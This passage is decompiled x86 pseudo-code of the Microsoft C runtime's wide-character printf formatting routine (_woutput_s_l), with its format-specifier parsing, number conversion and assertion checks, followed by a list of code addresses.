															__eax =  *( *(__ebp + 0xc)) & 0x0000ffff;
															__eflags = ( *( *(__ebp + 0xc)) & 0x0000ffff) - 0x58;
															if(( *( *(__ebp + 0xc)) & 0x0000ffff) != 0x58) {
																 *(__ebp - 0x45c) = 0;
																goto L18;
															}
															goto L59;
														}
														L51:
														__eax =  *(__ebp + 0xc);
														__ecx =  *( *(__ebp + 0xc) + 2) & 0x0000ffff;
														__eflags = __ecx - 0x32;
														if(__ecx != 0x32) {
															goto L53;
														} else {
															 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
															 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0xffff7fff;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0xffff7fff;
															goto L61;
														}
													}
													L48:
													__eax =  *(__ebp + 0xc);
													__ecx =  *( *(__ebp + 0xc) + 2) & 0x0000ffff;
													__eflags = __ecx - 0x34;
													if(__ecx != 0x34) {
														goto L50;
													} else {
														 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
														 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00008000;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00008000;
														goto L61;
													}
												case 1:
													L62:
													__ecx =  *(__ebp - 0x10);
													__ecx =  *(__ebp - 0x10) | 0x00000020;
													 *(__ebp - 0x10) = __ecx;
													goto L64;
												case 2:
													L43:
													__edx =  *(__ebp + 0xc);
													__eax =  *( *(__ebp + 0xc)) & 0x0000ffff;
													__eflags = ( *( *(__ebp + 0xc)) & 0x0000ffff) - 0x6c;
													if(( *( *(__ebp + 0xc)) & 0x0000ffff) != 0x6c) {
														__eax =  *(__ebp - 0x10);
														__eax =  *(__ebp - 0x10) | 0x00000010;
														__eflags = __eax;
														 *(__ebp - 0x10) = __eax;
													} else {
														__ecx =  *(__ebp + 0xc);
														__ecx =  *(__ebp + 0xc) + 2;
														 *(__ebp + 0xc) = __ecx;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00001000;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00001000;
													}
													goto L64;
												case 3:
													L63:
													__edx =  *(__ebp - 0x10);
													__edx =  *(__ebp - 0x10) | 0x00000800;
													__eflags = __edx;
													 *(__ebp - 0x10) = __edx;
													goto L64;
												case 4:
													goto L64;
											}
										case 7:
											L65:
											__eax =  *(__ebp - 0x454) & 0x0000ffff;
											 *(__ebp - 0x4ec) =  *(__ebp - 0x454) & 0x0000ffff;
											__ecx =  *(__ebp - 0x4ec);
											__ecx =  *(__ebp - 0x4ec) - 0x41;
											 *(__ebp - 0x4ec) = __ecx;
											__eflags =  *(__ebp - 0x4ec) - 0x37;
											if( *(__ebp - 0x4ec) > 0x37) {
												goto L187;
												do {
													do {
														while(1) {
															L187:
															if( *(_t596 - 0x28) != 0) {
																goto L212;
															}
															goto L188;
														}
														L183:
														__ebp - 0x249 = __ebp - 0x249 -  *(__ebp - 4);
														 *(__ebp - 0x24) = __ebp - 0x249 -  *(__ebp - 4);
														__ecx =  *(__ebp - 4);
														__ecx =  *(__ebp - 4) + 1;
														 *(__ebp - 4) = __ecx;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000200;
														__eflags =  *(__ebp - 0x10) & 0x00000200;
													} while (( *(__ebp - 0x10) & 0x00000200) == 0);
													__eflags =  *(__ebp - 0x24);
													if( *(__ebp - 0x24) == 0) {
														break;
													}
													L185:
													__eax =  *(__ebp - 4);
													__ecx =  *( *(__ebp - 4));
													__eflags = __ecx - 0x30;
												} while (__ecx == 0x30);
												L186:
												 *(__ebp - 4) =  *(__ebp - 4) - 1;
												 *(__ebp - 4) =  *(__ebp - 4) - 1;
												__eax =  *(__ebp - 4);
												 *( *(__ebp - 4)) = 0x30;
												__ecx =  *(__ebp - 0x24);
												__ecx =  *(__ebp - 0x24) + 1;
												__eflags = __ecx;
												 *(__ebp - 0x24) = __ecx;
												while(1) {
													L187:
													if( *(_t596 - 0x28) != 0) {
														goto L212;
													}
													goto L188;
												}
											}
											L66:
											_t143 =  *(__ebp - 0x4ec) + 0x423ef0; // 0xcccccc0d
											__eax =  *_t143 & 0x000000ff;
											switch( *((intOrPtr*)(( *_t143 & 0x000000ff) * 4 +  &M00423EB4))) {
												case 0:
													L119:
													 *(__ebp - 0x2c) = 1;
													 *(__ebp - 0x454) & 0x0000ffff = ( *(__ebp - 0x454) & 0x0000ffff) + 0x20;
													__eflags = ( *(__ebp - 0x454) & 0x0000ffff) + 0x20;
													 *(__ebp - 0x454) = __ax;
													goto L120;
												case 1:
													L67:
													 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000830;
													__eflags =  *(__ebp - 0x10) & 0x00000830;
													if(( *(__ebp - 0x10) & 0x00000830) == 0) {
														__edx =  *(__ebp - 0x10);
														__edx =  *(__ebp - 0x10) | 0x00000020;
														__eflags = __edx;
														 *(__ebp - 0x10) = __edx;
													}
													goto L69;
												case 2:
													L81:
													 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000830;
													__eflags =  *(__ebp - 0x10) & 0x00000830;
													if(( *(__ebp - 0x10) & 0x00000830) == 0) {
														__ecx =  *(__ebp - 0x10);
														__ecx =  *(__ebp - 0x10) | 0x00000020;
														__eflags = __ecx;
														 *(__ebp - 0x10) = __ecx;
													}
													goto L83;
												case 3:
													L143:
													 *(__ebp - 0x460) = 7;
													goto L145;
												case 4:
													goto L0;
												case 5:
													L120:
													 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000040;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000040;
													__edx = __ebp - 0x448;
													 *(__ebp - 4) = __ebp - 0x448;
													 *(__ebp - 0x44) = 0x200;
													__eflags =  *(__ebp - 0x30);
													if( *(__ebp - 0x30) >= 0) {
														L122:
														__eflags =  *(__ebp - 0x30);
														if( *(__ebp - 0x30) != 0) {
															L125:
															__eflags =  *(__ebp - 0x30) - 0x200;
															if( *(__ebp - 0x30) > 0x200) {
																 *(__ebp - 0x30) = 0x200;
															}
															L127:
															__eflags =  *(__ebp - 0x30) - 0xa3;
															if( *(__ebp - 0x30) > 0xa3) {
																__ecx =  *(__ebp - 0x30);
																__ecx =  *(__ebp - 0x30) + 0x15d;
																 *(__ebp - 0x20) = L0040E5B0( *(__ebp - 0x30) + 0x15d,  *(__ebp - 0x30) + 0x15d, 2, "f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x6da);
																__eflags =  *(__ebp - 0x20);
																if( *(__ebp - 0x20) == 0) {
																	 *(__ebp - 0x30) = 0xa3;
																} else {
																	__edx =  *(__ebp - 0x20);
																	 *(__ebp - 4) =  *(__ebp - 0x20);
																	 *(__ebp - 0x30) =  *(__ebp - 0x30) + 0x15d;
																	 *(__ebp - 0x44) =  *(__ebp - 0x30) + 0x15d;
																}
															}
															 *(__ebp + 0x14) =  *(__ebp + 0x14) + 8;
															 *(__ebp + 0x14) =  *(__ebp + 0x14) + 8;
															__edx =  *(__ebp + 0x14);
															__eax =  *(__edx - 8);
															__ecx =  *(__edx - 4);
															 *(__ebp - 0x490) =  *(__edx - 8);
															 *(__ebp - 0x48c) =  *(__edx - 4);
															__ecx = __ebp - 0x40;
															_push(E004103A0(__ebp - 0x40));
															__edx =  *(__ebp - 0x2c);
															_push( *(__ebp - 0x2c));
															__eax =  *(__ebp - 0x30);
															_push( *(__ebp - 0x30));
															__ecx =  *(__ebp - 0x454);
															_push( *(__ebp - 0x454));
															__edx =  *(__ebp - 0x44);
															_push( *(__ebp - 0x44));
															__eax =  *(__ebp - 4);
															_push( *(__ebp - 4));
															__ecx = __ebp - 0x490;
															_push(__ebp - 0x490);
															__edx =  *0x4bb808; // 0x776010b9
															E00411D00(__edx) =  *__eax();
															__esp = __esp + 0x1c;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
															__eflags =  *(__ebp - 0x10) & 0x00000080;
															if(( *(__ebp - 0x10) & 0x00000080) != 0) {
																__eflags =  *(__ebp - 0x30);
																if( *(__ebp - 0x30) == 0) {
																	__ecx = __ebp - 0x40;
																	_push(E004103A0(__ebp - 0x40));
																	__ecx =  *(__ebp - 4);
																	_push( *(__ebp - 4));
																	__edx =  *0x4bb814; // 0x776010b9
																	E00411D00(__edx) =  *__eax();
																	__esp = __esp + 8;
																}
															}
															__eax =  *(__ebp - 0x454) & 0x0000ffff;
															__eflags = ( *(__ebp - 0x454) & 0x0000ffff) - 0x67;
															if(( *(__ebp - 0x454) & 0x0000ffff) == 0x67) {
																 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
																__eflags =  *(__ebp - 0x10) & 0x00000080;
																if(( *(__ebp - 0x10) & 0x00000080) == 0) {
																	__ecx = __ebp - 0x40;
																	_push(E004103A0(__ebp - 0x40));
																	__edx =  *(__ebp - 4);
																	_push( *(__ebp - 4));
																	__eax =  *0x4bb810; // 0x776010b9
																	__eax =  *__eax();
																	__esp = __esp + 8;
																}
															}
															__ecx =  *(__ebp - 4);
															__edx =  *( *(__ebp - 4));
															__eflags =  *( *(__ebp - 4)) - 0x2d;
															if( *( *(__ebp - 4)) == 0x2d) {
																 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000100;
																 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000100;
																__ecx =  *(__ebp - 4);
																__ecx =  *(__ebp - 4) + 1;
																__eflags = __ecx;
																 *(__ebp - 4) = __ecx;
															}
															__edx =  *(__ebp - 4);
															 *(__ebp - 0x24) = E00410910( *(__ebp - 4));
															goto L187;
														}
														L123:
														__eax =  *(__ebp - 0x454) & 0x0000ffff;
														__eflags = ( *(__ebp - 0x454) & 0x0000ffff) - 0x67;
														if(( *(__ebp - 0x454) & 0x0000ffff) != 0x67) {
															goto L125;
														}
														L124:
														 *(__ebp - 0x30) = 1;
														goto L127;
													}
													L121:
													 *(__ebp - 0x30) = 6;
													goto L127;
												case 6:
													L69:
													 *(__ebp - 0xc) = 1;
													__ebp + 0x14 = E0041F270(__ebp + 0x14);
													 *(__ebp - 0x458) = __ax;
													__ecx =  *(__ebp - 0x10);
													__ecx =  *(__ebp - 0x10) & 0x00000020;
													__eflags = __ecx;
													if(__ecx == 0) {
														 *(__ebp - 0x448) =  *(__ebp - 0x458);
													} else {
														 *(__ebp - 0x458) & 0x0000ffff =  *(__ebp - 0x458) & 0xff;
														 *(__ebp - 0x470) = __dl;
														 *((char*)(__ebp - 0x46f)) = 0;
														__ecx = __ebp - 0x40;
														__eax = E004103A0(__ebp - 0x40);
														__ecx = __ebp - 0x40;
														E004103A0(__ebp - 0x40) =  *__eax;
														__ecx =  *(__ebp - 0x448 + 0xac);
														__edx = __ebp - 0x470;
														__eax = __ebp - 0x448;
														__eax = E00420B60(__ebp - 0x448, __ebp - 0x470,  *(__ebp - 0x448 + 0xac), __ebp - 0x448);
														__eflags = __eax;
														if(__eax < 0) {
															 *(__ebp - 0x28) = 1;
														}
													}
													__edx = __ebp - 0x448;
													 *(__ebp - 4) = __ebp - 0x448;
													 *(__ebp - 0x24) = 1;
													do {
														L187:
														if( *(_t596 - 0x28) != 0) {
															goto L212;
														}
														goto L188;
													} while ( *(__ebp - 0x4ec) > 0x37);
													goto L66;
												case 7:
													L140:
													 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000040;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000040;
													 *(__ebp - 8) = 0xa;
													goto L150;
												case 8:
													L105:
													__eax = __ebp + 0x14;
													 *(__ebp - 0x484) = E0041F270(__ebp + 0x14);
													__eax = E00424120();
													__eflags = __eax;
													if(__eax != 0) {
														L115:
														__ecx =  *(__ebp - 0x10);
														__ecx =  *(__ebp - 0x10) & 0x00000020;
														__eflags = __ecx;
														if(__ecx == 0) {
															__ecx =  *(__ebp - 0x484);
															__edx =  *(__ebp - 0x44c);
															 *__ecx =  *(__ebp - 0x44c);
														} else {
															__edx =  *(__ebp - 0x484);
															__ax =  *(__ebp - 0x44c);
															 *( *(__ebp - 0x484)) = __ax;
														}
														 *(__ebp - 0x28) = 1;
														while(1) {
															L187:
															if( *(_t596 - 0x28) != 0) {
																goto L212;
															}
															goto L188;
														}
													}
													L106:
													__ecx = 0;
													__eflags = 0;
													if(0 == 0) {
														 *(__ebp - 0x4f4) = 0;
													} else {
														 *(__ebp - 0x4f4) = 1;
													}
													__edx =  *(__ebp - 0x4f4);
													 *(__ebp - 0x488) =  *(__ebp - 0x4f4);
													__eflags =  *(__ebp - 0x488);
													if( *(__ebp - 0x488) == 0) {
														_push(L"(\"\'n\' format specifier disabled\", 0)");
														_push(0);
														_push(0x695);
														_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c");
														_push(2);
														__eax = L0040C820();
														__esp = __esp + 0x14;
														__eflags = __eax - 1;
														if(__eax == 1) {
															asm("int3");
														}
													}
													__eflags =  *(__ebp - 0x488);
													if( *(__ebp - 0x488) != 0) {
														L114:
														while(1) {
															L187:
															if( *(_t596 - 0x28) != 0) {
																goto L212;
															}
															goto L188;
														}
													} else {
														L113:
														 *((intOrPtr*)(L00411810(__ecx))) = 0x16;
														__eax = E0040C660(__ebx, __ecx, __edi, __esi, L"(\"\'n\' format specifier disabled\", 0)", L"_woutput_s_l", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x695, 0);
														 *(__ebp - 0x4cc) = 0xffffffff;
														__ecx = __ebp - 0x40;
														__eax = E00410370(__ecx);
														__eax =  *(__ebp - 0x4cc);
														goto L225;
													}
												case 9:
													L148:
													 *(__ebp - 8) = 8;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
													__eflags =  *(__ebp - 0x10) & 0x00000080;
													if(( *(__ebp - 0x10) & 0x00000080) != 0) {
														__edx =  *(__ebp - 0x10);
														__edx =  *(__ebp - 0x10) | 0x00000200;
														__eflags = __edx;
														 *(__ebp - 0x10) = __edx;
													}
													goto L150;
												case 0xa:
													L142:
													 *(__ebp - 0x30) = 8;
													goto L143;
												case 0xb:
													L83:
													__eflags =  *(__ebp - 0x30) - 0xffffffff;
													if( *(__ebp - 0x30) != 0xffffffff) {
														__edx =  *(__ebp - 0x30);
														 *(__ebp - 0x4f0) =  *(__ebp - 0x30);
													} else {
														 *(__ebp - 0x4f0) = 0x7fffffff;
													}
													__eax =  *(__ebp - 0x4f0);
													 *(__ebp - 0x47c) =  *(__ebp - 0x4f0);
													__ecx = __ebp + 0x14;
													 *(__ebp - 4) = E0041F270(__ebp + 0x14);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000020;
													__eflags =  *(__ebp - 0x10) & 0x00000020;
													if(( *(__ebp - 0x10) & 0x00000020) == 0) {
														L97:
														__eflags =  *(__ebp - 4);
														if( *(__ebp - 4) == 0) {
															__ecx =  *0x4bc064; // 0x408104
															 *(__ebp - 4) = __ecx;
														}
														 *(__ebp - 0xc) = 1;
														__edx =  *(__ebp - 4);
														 *(__ebp - 0x480) =  *(__ebp - 4);
														while(1) {
															L100:
															__eax =  *(__ebp - 0x47c);
															__ecx =  *(__ebp - 0x47c);
															__ecx =  *(__ebp - 0x47c) - 1;
															 *(__ebp - 0x47c) = __ecx;
															__eflags =  *(__ebp - 0x47c);
															if( *(__ebp - 0x47c) == 0) {
																break;
															}
															L101:
															__edx =  *(__ebp - 0x480);
															__eax =  *( *(__ebp - 0x480)) & 0x0000ffff;
															__eflags =  *( *(__ebp - 0x480)) & 0x0000ffff;
															if(( *( *(__ebp - 0x480)) & 0x0000ffff) == 0) {
																break;
															}
															L102:
															 *(__ebp - 0x480) =  *(__ebp - 0x480) + 2;
															 *(__ebp - 0x480) =  *(__ebp - 0x480) + 2;
														}
														L103:
														__edx =  *(__ebp - 0x480);
														__edx =  *(__ebp - 0x480) -  *(__ebp - 4);
														__eflags = __edx;
														 *(__ebp - 0x24) = __edx;
														goto L104;
													} else {
														L87:
														__eflags =  *(__ebp - 4);
														if( *(__ebp - 4) == 0) {
															__eax =  *0x4bc060; // 0x408114
															 *(__ebp - 4) = __eax;
														}
														__ecx =  *(__ebp - 4);
														 *(__ebp - 0x478) = __ecx;
														 *(__ebp - 0x24) = 0;
														while(1) {
															L91:
															__eax =  *(__ebp - 0x24);
															__eflags =  *(__ebp - 0x24) -  *(__ebp - 0x47c);
															if( *(__ebp - 0x24) >=  *(__ebp - 0x47c)) {
																break;
															}
															L92:
															__ecx =  *(__ebp - 0x478);
															__edx =  *__ecx;
															__eflags =  *__ecx;
															if( *__ecx == 0) {
																break;
															}
															L93:
															__ecx = __ebp - 0x40;
															E004103A0(__ebp - 0x40) =  *(__ebp - 0x478);
															__ecx =  *( *(__ebp - 0x478)) & 0x000000ff;
															__eax = E00420DA0( *( *(__ebp - 0x478)) & 0x000000ff,  *(__ebp - 0x478));
															__eflags = __eax;
															if(__eax != 0) {
																__edx =  *(__ebp - 0x478);
																__edx =  *(__ebp - 0x478) + 1;
																__eflags = __edx;
																 *(__ebp - 0x478) = __edx;
															}
															 *(__ebp - 0x478) =  *(__ebp - 0x478) + 1;
															 *(__ebp - 0x478) =  *(__ebp - 0x478) + 1;
															__edx =  *(__ebp - 0x24);
															__edx =  *(__ebp - 0x24) + 1;
															__eflags = __edx;
															 *(__ebp - 0x24) = __edx;
														}
														L96:
														L104:
														while(1) {
															L187:
															if( *(_t596 - 0x28) != 0) {
																goto L212;
															}
															goto L188;
														}
													}
												case 0xc:
													L141:
													 *(__ebp - 8) = 0xa;
													goto L150;
												case 0xd:
													L144:
													 *(__ebp - 0x460) = 0x27;
													L145:
													 *(__ebp - 8) = 0x10;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
													__eflags =  *(__ebp - 0x10) & 0x00000080;
													if(( *(__ebp - 0x10) & 0x00000080) != 0) {
														__edx = 0x30;
														 *((short*)(__ebp - 0x14)) = __dx;
														 *(__ebp - 0x460) =  *(__ebp - 0x460) + 0x51;
														__eflags =  *(__ebp - 0x460) + 0x51;
														 *(__ebp - 0x12) = __ax;
														 *(__ebp - 0x1c) = 2;
													}
													L150:
													 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00008000;
													__eflags =  *(__ebp - 0x10) & 0x00008000;
													if(( *(__ebp - 0x10) & 0x00008000) == 0) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00001000;
														__eflags =  *(__ebp - 0x10) & 0x00001000;
														if(( *(__ebp - 0x10) & 0x00001000) == 0) {
															 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000020;
															__eflags =  *(__ebp - 0x10) & 0x00000020;
															if(( *(__ebp - 0x10) & 0x00000020) == 0) {
																 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
																__eflags =  *(__ebp - 0x10) & 0x00000040;
																if(( *(__ebp - 0x10) & 0x00000040) == 0) {
																	__ecx = __ebp + 0x14;
																	__eax = E0041F270(__ebp + 0x14);
																	__edx = 0;
																	__eflags = 0;
																	 *(__ebp - 0x4a0) = __eax;
																	 *(__ebp - 0x49c) = 0;
																} else {
																	__eax = __ebp + 0x14;
																	__eax = E0041F270(__ebp + 0x14);
																	asm("cdq");
																	 *(__ebp - 0x4a0) = __eax;
																	 *(__ebp - 0x49c) = __edx;
																}
															} else {
																 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
																__eflags =  *(__ebp - 0x10) & 0x00000040;
																if(( *(__ebp - 0x10) & 0x00000040) == 0) {
																	__ecx = __ebp + 0x14;
																	E0041F270(__ebp + 0x14) = __ax & 0x0000ffff;
																	asm("cdq");
																	 *(__ebp - 0x4a0) = __ax & 0x0000ffff;
																	 *(__ebp - 0x49c) = __edx;
																} else {
																	__eax = __ebp + 0x14;
																	__eax = E0041F270(__ebp + 0x14);
																	__ax = __eax;
																	asm("cdq");
																	 *(__ebp - 0x4a0) = __eax;
																	 *(__ebp - 0x49c) = __edx;
																}
															}
														} else {
															__eax = __ebp + 0x14;
															 *(__ebp - 0x4a0) = E0041F290(__ebp + 0x14);
															 *(__ebp - 0x49c) = __edx;
														}
													} else {
														__ecx = __ebp + 0x14;
														 *(__ebp - 0x4a0) = E0041F290(__ebp + 0x14);
														 *(__ebp - 0x49c) = __edx;
													}
													 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
													__eflags =  *(__ebp - 0x10) & 0x00000040;
													if(( *(__ebp - 0x10) & 0x00000040) == 0) {
														L167:
														__ecx =  *(__ebp - 0x4a0);
														 *(__ebp - 0x4a8) =  *(__ebp - 0x4a0);
														__edx =  *(__ebp - 0x49c);
														 *(__ebp - 0x4a4) =  *(__ebp - 0x49c);
														goto L168;
													} else {
														L163:
														__eflags =  *(__ebp - 0x49c);
														if(__eflags > 0) {
															goto L167;
														}
														L164:
														if(__eflags < 0) {
															L166:
															 *(__ebp - 0x4a0) =  ~( *(__ebp - 0x4a0));
															__edx =  *(__ebp - 0x49c);
															asm("adc edx, 0x0");
															__edx =  ~( *(__ebp - 0x49c));
															 *(__ebp - 0x4a8) =  ~( *(__ebp - 0x4a0));
															 *(__ebp - 0x4a4) =  ~( *(__ebp - 0x49c));
															 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000100;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000100;
															L168:
															 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00008000;
															__eflags =  *(__ebp - 0x10) & 0x00008000;
															if(( *(__ebp - 0x10) & 0x00008000) == 0) {
																 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00001000;
																__eflags =  *(__ebp - 0x10) & 0x00001000;
																if(( *(__ebp - 0x10) & 0x00001000) == 0) {
																	__edx =  *(__ebp - 0x4a8);
																	__eax =  *(__ebp - 0x4a4);
																	__eax =  *(__ebp - 0x4a4) & 0x00000000;
																	__eflags = __eax;
																	 *(__ebp - 0x4a4) = __eax;
																}
															}
															__eflags =  *(__ebp - 0x30);
															if( *(__ebp - 0x30) >= 0) {
																 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0xfffffff7;
																 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0xfffffff7;
																__eflags =  *(__ebp - 0x30) - 0x200;
																if( *(__ebp - 0x30) > 0x200) {
																	 *(__ebp - 0x30) = 0x200;
																}
															} else {
																 *(__ebp - 0x30) = 1;
															}
															 *(__ebp - 0x4a8) =  *(__ebp - 0x4a8) |  *(__ebp - 0x4a4);
															__eflags =  *(__ebp - 0x4a8) |  *(__ebp - 0x4a4);
															if(( *(__ebp - 0x4a8) |  *(__ebp - 0x4a4)) == 0) {
																 *(__ebp - 0x1c) = 0;
															}
															__eax = __ebp - 0x249;
															 *(__ebp - 4) = __ebp - 0x249;
															while(1) {
																L178:
																__ecx =  *(__ebp - 0x30);
																 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
																 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
																__eflags =  *(__ebp - 0x30);
																if( *(__ebp - 0x30) > 0) {
																	goto L180;
																}
																L179:
																 *(__ebp - 0x4a8) =  *(__ebp - 0x4a8) |  *(__ebp - 0x4a4);
																__eflags =  *(__ebp - 0x4a8) |  *(__ebp - 0x4a4);
																if(( *(__ebp - 0x4a8) |  *(__ebp - 0x4a4)) == 0) {
																	goto L183;
																}
																L180:
																__eax =  *(__ebp - 8);
																asm("cdq");
																__ecx =  *(__ebp - 0x4a4);
																__edx =  *(__ebp - 0x4a8);
																__eax = E00421720( *(__ebp - 0x4a8),  *(__ebp - 0x4a4),  *(__ebp - 8),  *(__ebp - 0x4a8));
																 *(__ebp - 0x494) = __eax;
																__eax =  *(__ebp - 8);
																asm("cdq");
																__eax =  *(__ebp - 0x4a4);
																__ecx =  *(__ebp - 0x4a8);
																 *(__ebp - 0x4a8) = E004216B0( *(__ebp - 0x4a8),  *(__ebp - 0x4a4),  *(__ebp - 8), __edx);
																 *(__ebp - 0x4a4) = __edx;
																__eflags =  *(__ebp - 0x494) - 0x39;
																if( *(__ebp - 0x494) > 0x39) {
																	__edx =  *(__ebp - 0x494);
																	__edx =  *(__ebp - 0x494) +  *(__ebp - 0x460);
																	__eflags = __edx;
																	 *(__ebp - 0x494) = __edx;
																}
																__eax =  *(__ebp - 4);
																 *( *(__ebp - 4)) =  *(__ebp - 0x494);
																 *(__ebp - 4) =  *(__ebp - 4) - 1;
																 *(__ebp - 4) =  *(__ebp - 4) - 1;
																L178:
																__ecx =  *(__ebp - 0x30);
																 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
																 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
																__eflags =  *(__ebp - 0x30);
																if( *(__ebp - 0x30) > 0) {
																	goto L180;
																}
																goto L179;
															}
														}
														L165:
														__eflags =  *(__ebp - 0x4a0);
														if( *(__ebp - 0x4a0) >= 0) {
															goto L167;
														}
														goto L166;
													}
												case 0xe:
													while(1) {
														L187:
														if( *(_t596 - 0x28) != 0) {
															goto L212;
														}
														goto L188;
													}
											}
										case 8:
											L24:
											__ecx =  *(__ebp - 0x10);
											__ecx =  *(__ebp - 0x10) | 0x00000002;
											 *(__ebp - 0x10) = __ecx;
											goto L27;
										case 9:
											L25:
											 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000080;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000080;
											goto L27;
										case 0xa:
											L23:
											 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000001;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000001;
											goto L27;
										case 0xb:
											L22:
											 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000004;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000004;
											goto L27;
										case 0xc:
											L26:
											__eax =  *(__ebp - 0x10);
											__eax =  *(__ebp - 0x10) | 0x00000008;
											__eflags = __eax;
											 *(__ebp - 0x10) = __eax;
											goto L27;
										case 0xd:
											L27:
											goto L214;
									}
								} else {
									_t571 = 0;
									if(0 == 0) {
										 *(_t596 - 0x4dc) = 0;
									} else {
										 *(_t596 - 0x4dc) = 1;
									}
									 *(_t596 - 0x46c) =  *(_t596 - 0x4dc);
									if( *(_t596 - 0x46c) == 0) {
										_push(L"(\"Incorrect format specifier\", 0)");
										_push(0);
										_push(0x460);
										_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c");
										_push(2);
										_t502 = L0040C820();
										_t599 = _t599 + 0x14;
										if(_t502 == 1) {
											asm("int3");
										}
									}
									L14:
									if( *(_t596 - 0x46c) != 0) {
										goto L16;
									} else {
										 *((intOrPtr*)(L00411810(_t543))) = 0x16;
										E0040C660(_t534, _t543, _t594, _t595, L"(\"Incorrect format specifier\", 0)", L"_woutput_s_l", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x460, 0);
										 *(_t596 - 0x4c8) = 0xffffffff;
										E00410370(_t596 - 0x40);
										_t487 =  *(_t596 - 0x4c8);
										L225:
										return E00410900(_t487, _t534,  *(_t596 - 0x48) ^ _t596, _t571, _t594, _t595);
									}
								}
							}
							L215:
							if( *(_t596 - 0x45c) == 0) {
								L218:
								 *(_t596 - 0x4f8) = 1;
								L219:
								_t571 =  *(_t596 - 0x4f8);
								 *(_t596 - 0x4bc) =  *(_t596 - 0x4f8);
								if( *(_t596 - 0x4bc) == 0) {
									_push(L"((state == ST_NORMAL) || (state == ST_TYPE))");
									_push(0);
									_push(0x8f5);
									_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c");
									_push(2);
									_t492 = L0040C820();
									_t599 = _t599 + 0x14;
									if(_t492 == 1) {
										asm("int3");
									}
								}
								if( *(_t596 - 0x4bc) != 0) {
									 *(_t596 - 0x4d4) =  *(_t596 - 0x44c);
									E00410370(_t596 - 0x40);
									_t487 =  *(_t596 - 0x4d4);
								} else {
									 *((intOrPtr*)(L00411810(_t535))) = 0x16;
									E0040C660(_t534, _t535, _t594, _t595, L"((state == ST_NORMAL) || (state == ST_TYPE))", L"_woutput_s_l", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x8f5, 0);
									 *(_t596 - 0x4d0) = 0xffffffff;
									E00410370(_t596 - 0x40);
									_t487 =  *(_t596 - 0x4d0);
								}
								goto L225;
							}
							L216:
							if( *(_t596 - 0x45c) == 7) {
								goto L218;
							}
							L217:
							 *(_t596 - 0x4f8) = 0;
							goto L219;
						}
					}
					L76:
					_t567 =  *0x4bc060; // 0x408114
					 *(_t596 - 4) = _t567;
					_t484 = E00410910( *(_t596 - 4));
					_t599 = _t599 + 4;
					 *(_t596 - 0x24) = _t484;
					goto L80;
				}
			}

0x004233c4
0x004233c4
0x004233c4
0x004233c8
0x004233cd
0x004233d0
0x004233dd
0x00000000
0x00000000
0x004233df
0x004233df
0x004233e9
0x00423408
0x0042340e
0x00423436
0x0042343d
0x00423443
0x00423446
0x00423449
0x0042344f
0x00423452
0x00423410
0x00423410
0x00423416
0x00423419
0x0042341c
0x00423422
0x00423425
0x00423428
0x0042342a
0x0042342d
0x0042342d
0x00423455
0x00423b50
0x00423b50
0x00423b54
0x00000000
0x00000000
0x00423b5a
0x00423b60
0x00423b6a
0x00423b84
0x00423b9e
0x00423ba5
0x00423ba9
0x00423ba9
0x00423b86
0x00423b8b
0x00423b8f
0x00423b8f
0x00423b6c
0x00423b71
0x00423b75
0x00423b75
0x00423b6a
0x00423bb9
0x00423bc5
0x00423bdb
0x00423be0
0x00423be0
0x00423bf6
0x00423bfb
0x00423c04
